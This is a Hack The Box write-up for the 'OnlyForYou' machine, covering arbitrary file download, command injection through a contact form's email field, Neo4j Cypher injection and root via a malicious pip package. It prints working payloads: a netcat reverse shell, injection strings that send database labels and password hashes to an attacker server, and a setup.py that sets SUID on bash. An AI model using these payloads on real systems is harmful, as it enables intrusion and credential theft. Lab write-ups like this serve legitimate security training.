OnlyForYou

Write up for the HTB machine 'OnlyForYou'

1. Initial recon

1.1. nikto

nikto -host 10.10.11.210

- Server: nginx/1.18.0 (Ubuntu)
- Root page / redirects to: http://only4you.htb/
- nginx/1.18.0 appears to be outdated (current is at least 1.20.1).

1.2. nmap

nmap -sC -sV 10.10.11.210

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_  256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.3. web application recon

Under the Frequently Asked Questions section there is a "Are there some products available to check?" section which leads to beta.only4you.htb

From beta.only4you.htb we can download some source code

Looking in app.py we can find

  • /list

  • /download

  • /convert (also linked on the nav bar of the web app)

  • /resize (also linked on the nav bar of the web app)

after uploading an image, we are redirected to a download page where we can download a resized image of the one we just uploaded, here we find a Local File Inclusion vulnerability where we are able to download any file on the system that we want.

  • capture the download in BurpSuite and change the file name in the POST request parameter image

by downloading /etc/passwd we can see some users

john:x:1000:1000:john:/home/john:/bin/bash
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash

we know from our nikto scan that the server is running nginx so we should also take a look at /etc/nginx/sites-available/default

server {
    listen 80;
    return 301 http://only4you.htb$request_uri;
}

server {
	listen 80;
	server_name only4you.htb;

	location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
	}
}

server {
	listen 80;
	server_name beta.only4you.htb;

        location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
        }
}

this reveals that the main app.py is at /var/www/only4you.htb/app.py

looking in app.py we can see an import for forms.py

in forms.py we can see that there is RCE via the lines

domain = email.split("@", 1)[1]
result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)

with the payload being delivered through the post request on the contact form found on only4you.htb

name=123&email=123%40abc.def|rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.x.x+4444+>/tmp/f&subject=123&message=123

now we have a reverse shell as the user www-data

2. user.txt

With our www-data reverse shell let's start by making it an interactive shell by running python3 -c 'import pty;pty.spawn("/bin/bash");'

2.1. linpeas

By navigating to /tmp on the victim machine, and hosting a http server using python3 -m http.server on our attacking machine, we can then run curl 10.10.x.x:8000/linpeas.sh > linpeas.sh and chmod +x linpeas.sh on the victim machine to download and run linpeas on the victim machine to (hopefully) find any simple privilege escalation vectors.

the most interesting output from linpeas is the active ports

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                           
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                       
tcp        0      0 127.0.0.1:8001          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1036/nginx: worker  
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 127.0.0.1:7687          :::*                    LISTEN      -                   
tcp6       0      0 127.0.0.1:7474          :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

so let's investigate these more

simply curling them with curl 127.0.0.1:PORT reveals:

curl 127.0.0.1:3000
...
<meta name="author" content="Gogs" />
<meta name="description" content="Gogs is a painless self-hosted Git service" />
<meta name="keywords" content="go, git, self-hosted, gogs">
...
curl 127.0.0.1:8001
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login">/login</a>. If not, click the link.
curl 127.0.0.1:7474
{
  "bolt_routing" : "neo4j://127.0.0.1:7687",
  "transaction" : "http://127.0.0.1:7474/db/{databaseName}/tx",
  "bolt_direct" : "bolt://127.0.0.1:7687",
  "neo4j_version" : "5.6.0",
  "neo4j_edition" : "community"
}

2.2. chisel (port forwarding)

so now let's try and port forward them so we can view them in the browser

let's use Chisel

similar to linpeas we also need to curl chisel to the victim machine using the same method

  • once chisel is on the victim machine run the following commands

    • ./chisel server -p 12312 --reverse on your attacking machine

    • ./chisel client 10.10.x.x:12312 R:8001:127.0.0.1:8001 on the victim machine for the admin dashboard

    • ./chisel client 10.10.14.6:12312 R:3000:127.0.0.1:3000 on the victim machine for the local git service

then we can navigate to 127.0.0.1:8001/login and we will be presented with a log in screen

trying some default credentials

admin:admin

leads us to a dashboard

2.3. neo4j injection

we can see on the dashboard that the database has been updated to Neo4j so let's see if there are any vulnerabilities

from HackTricks there are a couple of injection payloads we can try

to catch these payloads, spin up another http server using python on your attacking machine, python3 -m http.server

' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.x.x:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

This payload we can find on hacktricks, but noticing that the above payload works, and this one doesn't we can slightly modify it

'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0

to this

' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip:8000/?label='+label as l RETURN 0 as _0 //

from the above payload we can see that there are two labels user and employee (check the shell where you're running your python server)

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -

finally, this payload

' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

is modified to this

' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

and we are presented with this output

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -

now let's try and crack these hashes on CrackStation

8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918	sha256	admin
a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6	sha256	ThisIs4You

we are now able to ssh into the machine with the credentials

john:ThisIs4You

user.txt is located in /home/john

3. root.txt

Remembering we also port forwarded the local git service which is at port 3000. at localhost:3000/explore/users we can see that john is also a user, so let's see if he reuses his credentials, he does. Unfortunately there's nothing really interesting on the git repositories

sudo -l on our ssh terminal shows

User john may run the following commands on only4you:
    (root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz

The first link after googling "pip install download vuln" returns us this article

clone the repo linked in the article to our attacking machine

and then we can simply change setup.py to

...
import os

def RunCommand():
    os.system("chmod u+s /bin/bash")
    ...

run python -m build in the directory of the cloned repo to create our payload

to get the payload to work we first need to make the Test repo at http://localhost:3000/john/Test public and then we can upload our payload

our command on the victim machine will finally be:

sudo /usr/bin/pip3 download http\://127.0.0.1\:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz

then run /bin/bash -p on the victim machine and we are root!

PreviousNetmonNextOptimum

Last updated